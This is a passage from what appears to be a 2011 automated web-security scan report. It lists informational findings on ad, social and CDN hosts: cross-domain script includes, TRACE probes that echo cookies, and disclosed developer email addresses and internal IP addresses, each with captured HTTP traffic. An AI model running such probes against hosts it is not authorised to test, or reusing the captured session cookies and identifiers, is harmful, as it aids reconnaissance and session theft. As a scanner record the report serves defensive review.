</script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0/prototype.js"></script>
<script language="javascript"
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js"></script>
...[SNIP]...
<div id="logo_wrap">
<a href="http://www.windowsitpro.com" target="_blank">
<img class="pubn_logo" src="assetContent.act?id=346"
alt="Windows IT Pro"/>
...[SNIP]...
<td align="left">
<a href="http://www.windowsitpro.com" target="_blank">Windows IT Pro</a>
...[SNIP]...
<div id="section_ftr">
               <a href="http://www.penton.com" target="_blank">
                   <img class="pubr_logo"
                       src="assetContent.act?id=344"
                       alt="Penton Media, Inc" />
...[SNIP]...
</a>
|
<a href="http://www.clipandcopy.com/" target="_blank">Clip&Copy®</a>
...[SNIP]...

12. Cross-domain script include previous next
There are 8 instances of this issue:

http://a.tribalfusion.com/j.ad
http://getfirebug.com/firstrun
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
http://license.icopyright.net/rights/offer.act
http://license.icopyright.net/rights/tag.act

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

12.1. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The response dynamically includes the following script from another domain:

http://ad.z5x.net/st?ad_type=ad&ad_size=728x90&section=762900

Request

Response

12.2. http://getfirebug.com/firstrun previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://getfirebug.com
Path:	/firstrun

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.0/jquery.min.js

Request

GET /firstrun HTTP/1.1
Host: getfirebug.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:20:25 GMT
Server: Apache
Content-Location: firstrun.php
Vary: negotiate
TCN: choice
X-Backend-Server: pm-app-generic01
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=1, private, must-revalidate
Expires: Thu, 23 Jun 2011 14:20:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 11170

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">

<title>Firebug</title>

<link rel="shortcut icon" type="image/x-icon" href="/img/favicon.ico">
<link
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.0/jquery.min.js"></script>
...[SNIP]...

12.3. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js

Request

Response

12.4. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=lC2SdqOvB0CULZJ2o68HQAAAAAAAAAhAlC2SdqOvB0CVLZJ2o68HQKCKN4OvYNZW_ayDGovBdy8lSwNOAAAAAFowAAC1AAAANQEAAAIAAABtowUA0WMAAAEAAABVU0QAVVNEACwB-gDcAE0ArAQBAgUCAQQAAAAAkh_v_AAAAAA.&tt_code=vert-343&udj=uf%28%27a%27%2C+15288%2C+1308838693%29%3Buf%28%27r%27%2C+369517%2C+1308838693%29%3Bppv%2811776%2C+%276257295039214881440%27%2C+1308838693%2C+1311430693%2C+62058%2C+25553%29%3B&cnd=!9SSErwjq5AMQ7cYWGAAg0ccBMAA43AFAAEi1AlAAWABgVWgAcBp4puMBgAG2AYgB6kSQAQGYAQGgAQGoAQOwAQG5AcrmMqCjrwdAwQHK5jKgo68HQMkBDYnuKtqU7z_QAQDZAQAAAAAAAPA_4AEA&ccd=!hAX0Lgjq5AMQ7cYWGNHHASAA&referrer=http://www.sqlmag.com/categories/category/t-sql-powershell-scripting&pp=TgNLJQADgooK7F3hcpxpnuMo51wT9E1gpZAvmA&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJz9mJUsDToqFDuG7sQee0_GUB-_675oCp439xBrj246PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0wMDgzMDMzNDgyMjM1MDcxsgEOd3d3LnNxbG1hZy5jb226AQozMDB4MjUwX2FzyAEJ2gFEaHR0cDovL3d3dy5zcWxtYWcuY29tL2NhdGVnb3JpZXMvY2F0ZWdvcnkvdC1zcWwtcG93ZXJzaGVsbC1zY3JpcHRpbmeYAvYTwAIEyAKrgqUOqAMB6APXAugD3AX1AwIAAESABq6xlomLuorgeQ%26num%3D1%26sig%3DAGiWqtzVjKC-oZZvJO81emr6TpLC3c-7mw%26client%3Dca-pub-0083033482235071%26adurl%3D

Request

Response

12.5. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://a.adroll.com/j/rolling.js

Request

Response

12.6. http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ibnlive.in.com
Path:	/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://tweetmeme.com/i/scripts/button.js
http://www.google.com/buzz/api/button.js

Request

GET /generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html HTTP/1.1
Host: ibnlive.in.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 23 Jun 2011 13:44:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Jun 2011 13:44:28 GMT
Content-Length: 61014
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script type='text/javascript' src='http://tweetmeme.com/i/scripts/button.js'></script>
...[SNIP]...
</script>
<script src="http://www.google.com/buzz/api/button.js" type="text/javascript"></script>
<script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...

12.7. http://license.icopyright.net/rights/offer.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/offer.act

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.0/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js

Request

GET /rights/offer.act?inprocess=t&sid=18&tag=7.7009&urs=WEBPAGE&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858 HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response

12.8. http://license.icopyright.net/rights/tag.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/tag.act

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.0/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js

Request

Response

13. TRACE method is enabled previous next
There are 4 instances of this issue:

http://api.demandbase.com/
http://bh.contextweb.com/
http://dp.specificclick.net/
http://future.grapeshot.co.uk/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

13.1. http://api.demandbase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.demandbase.com
Path:	/

Request

TRACE / HTTP/1.0
Host: api.demandbase.com
Cookie: decc01edec273f5f

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Thu, 23 Jun 2011 13:44:19 GMT
Server: Apache
Content-Length: 177
Connection: Close

TRACE / HTTP/1.1
host: api.demandbase.com
Cookie: decc01edec273f5f
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

13.2. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: a6b9ef2be50d2ee4

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Content-Type: message/http
Content-Length: 845
Date: Thu, 23 Jun 2011 13:44:51 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: a6b9ef2be50d2ee4; cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-1
...[SNIP]...

13.3. http://dp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dp.specificclick.net
Path:	/

Request

TRACE / HTTP/1.0
Host: dp.specificclick.net
Cookie: 7c3033b2beab09f8

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 88
Date: Thu, 23 Jun 2011 11:13:02 GMT
Connection: close

TRACE / HTTP/1.0
host: dp.specificclick.net
cookie: 7c3033b2beab09f8; ADVIVA=NOTRACK

13.4. http://future.grapeshot.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://future.grapeshot.co.uk
Path:	/

Request

TRACE / HTTP/1.0
Host: future.grapeshot.co.uk
Cookie: 3ac193683d696a0e

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:31 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: future.grapeshot.co.uk
Cookie: 3ac193683d696a0e; uid=1207876142

14. Email addresses disclosed previous next
There are 6 instances of this issue:

http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/controls.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js
http://cdn.static.techradar.com//default/js/jquery.colorbox-min.js
http://getfirebug.com/styles/master.css
http://getfirebug.com/styles/reset.css
http://getfirebug.com/styles/screen.css

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

14.1. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/scriptaculous/1.8.1/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /ajax/libs/scriptaculous/1.8.1/controls.js HTTP/1.1
Host: ajax.googleapis.com
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Tue, 09 Feb 2010 23:05:02 GMT
Date: Wed, 22 Jun 2011 15:24:21 GMT
Expires: Thu, 21 Jun 2012 15:24:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Content-Length: 34868
Age: 82410

// script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

14.2. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/scriptaculous/1.8.1/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

GET /ajax/libs/scriptaculous/1.8.1/dragdrop.js HTTP/1.1
Host: ajax.googleapis.com
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Tue, 09 Feb 2010 23:05:02 GMT
Date: Wed, 22 Jun 2011 15:40:24 GMT
Expires: Thu, 21 Jun 2012 15:40:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Content-Length: 31605
Age: 81447

// script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

14.3. http://cdn.static.techradar.com//default/js/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.static.techradar.com
Path:	//default/js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET //default/js/jquery.colorbox-min.js HTTP/1.1
Host: cdn.static.techradar.com
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:27 GMT
Expires: Thu, 23 Jun 2011 14:30:25 GMT
Last-Modified: Mon, 21 Mar 2011 09:35:25 GMT
Cache-Control: max-age=3600
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: nginx/0.5.29
Content-Length: 9192

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi
...[SNIP]...

14.4. http://getfirebug.com/styles/master.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://getfirebug.com
Path:	/styles/master.css

Issue detail

The following email address was disclosed in the response:

neilio@mozilla.com

Request

GET /styles/master.css HTTP/1.1
Host: getfirebug.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://getfirebug.com/styles/screen.css?v2

Response

HTTP/1.1 200 OK
Date: Sat, 18 Jun 2011 00:01:01 GMT
Expires: Sat, 25 Jun 2011 00:09:50 GMT
Connection: Keep-Alive
Via: NS-CACHE-6.0: 4
Server: Apache
X-Backend-Server: pm-app-generic03
Accept-Ranges: bytes
ntCoent-Length: 18426
Keep-Alive: timeout=5, max=1000
Content-Type: text/css
Cache-Control: private
Content-Length: 18426

/*
Title:        Master styles for screen media
Author:    neilio@mozilla.com
*/

/* page structure
--------------------------------------------- */

img {
max-width: 100%;
}

@font-face {
   font-family: 'TitilliumMaps';
   src: url('../fonts/TitilliumMaps26L002.eot');
   src:
...[SNIP]...

14.5. http://getfirebug.com/styles/reset.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://getfirebug.com
Path:	/styles/reset.css

Issue detail

The following email address was disclosed in the response:

neilio@mozilla.com

Request

GET /styles/reset.css HTTP/1.1
Host: getfirebug.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://getfirebug.com/styles/screen.css?v2

Response

HTTP/1.1 200 OK
Date: Sat, 18 Jun 2011 00:01:02 GMT
Expires: Sat, 25 Jun 2011 00:09:51 GMT
Connection: Keep-Alive
Via: NS-CACHE-6.0: 4
Server: Apache
X-Backend-Server: pm-app-generic02
Accept-Ranges: bytes
ntCoent-Length: 696
Keep-Alive: timeout=5, max=998
Content-Type: text/css
Cache-Control: private
Content-Length: 696

/*
Title: Reset default browser styles
Author: neilio@mozilla.com
*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike,
...[SNIP]...

14.6. http://getfirebug.com/styles/screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://getfirebug.com
Path:	/styles/screen.css

Issue detail

The following email address was disclosed in the response:

neilio@mozilla.com

Request

GET /styles/screen.css?v2 HTTP/1.1
Host: getfirebug.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://getfirebug.com/firstrun

Response

HTTP/1.1 200 OK
Date: Sat, 18 Jun 2011 00:01:00 GMT
Expires: Sat, 25 Jun 2011 00:09:49 GMT
Connection: Keep-Alive
Via: NS-CACHE-6.0: 4
Server: Apache
X-Backend-Server: pm-app-generic05
Accept-Ranges: bytes
ntCoent-Length: 198
Keep-Alive: timeout=5, max=984
Content-Type: text/css
Cache-Control: private
Content-Length: 198

/*
Title: Screen styles and ie/win patches
Author: neilio@mozilla.com
*/

/* import stylesheets and hide from ie/mac \*/
@import url("reset.css");
@import url("master.css");
/* end import/hide */

15. Private IP addresses disclosed previous next
There are 7 instances of this issue:

http://api.facebook.com/restserver.php
http://connect.facebook.net/en_US/all.js
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

15.1. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.5.124

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fibnlive.in.com%2Fgeneralnewsfeed%2Fnews%2Ffinancial-firms-required-to-beef-up-computer-security%2F735356.html%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Thu, 23 Jun 2011 06:46:53 -0700
Pragma:
X-FB-Rev: 396123
X-FB-Server: 10.36.5.124
X-Cnection: close
Date: Thu, 23 Jun 2011 13:44:53 GMT
Content-Length: 405

fb_sharepro_render([{"url":"http:\/\/ibnlive.in.com\/generalnewsfeed\/news\/financial-firms-required-to-beef-up-computer-security\/735356.html","normalized_url":"http:\/\/ibnlive.in.com\/generalnewsfe
...[SNIP]...

15.2. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.179.129

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "032619f53ffe687ececb501b8e183582"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "c32e1ab1dd65bb74a95a418d68adbfe8"
X-FB-Server: 10.32.179.129
X-Cnection: close
Content-Length: 128030
Cache-Control: public, max-age=213
Expires: Thu, 23 Jun 2011 13:48:26 GMT
Date: Thu, 23 Jun 2011 13:44:53 GMT
Connection: close
Vary: Accept-Encoding

/*1308800066,169915265,JIT Construction: v396123,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

15.3. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.253.44

Request

GET /safe_image.php?d=AQBKbMUOVWNodawk&url=http%3A%2F%2Fcdn.mos.techradar.com%2F%2FReview+images%2FPhotoRadar%2FCamera+Announcements%2FLytro+camera+technology-218-85.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=http%3A%2F%2Fwww.techradar.com&border_color=white&header=true&height=300&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.techradar.com&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.253.44
X-Cnection: close
Content-Length: 7563
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Fri, 24 Jun 2011 13:45:06 GMT
Date: Thu, 23 Jun 2011 13:45:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

15.4. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.234.59

Request

GET /safe_image.php?d=AQBUd1wH-I6FGqLV&url=http%3A%2F%2Fcdn.mos.techradar.com%2F%2Fclassifications%2Fpeople%2FDanl+Lewin-218-85.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=http%3A%2F%2Fwww.techradar.com&border_color=white&header=true&height=300&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.techradar.com&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
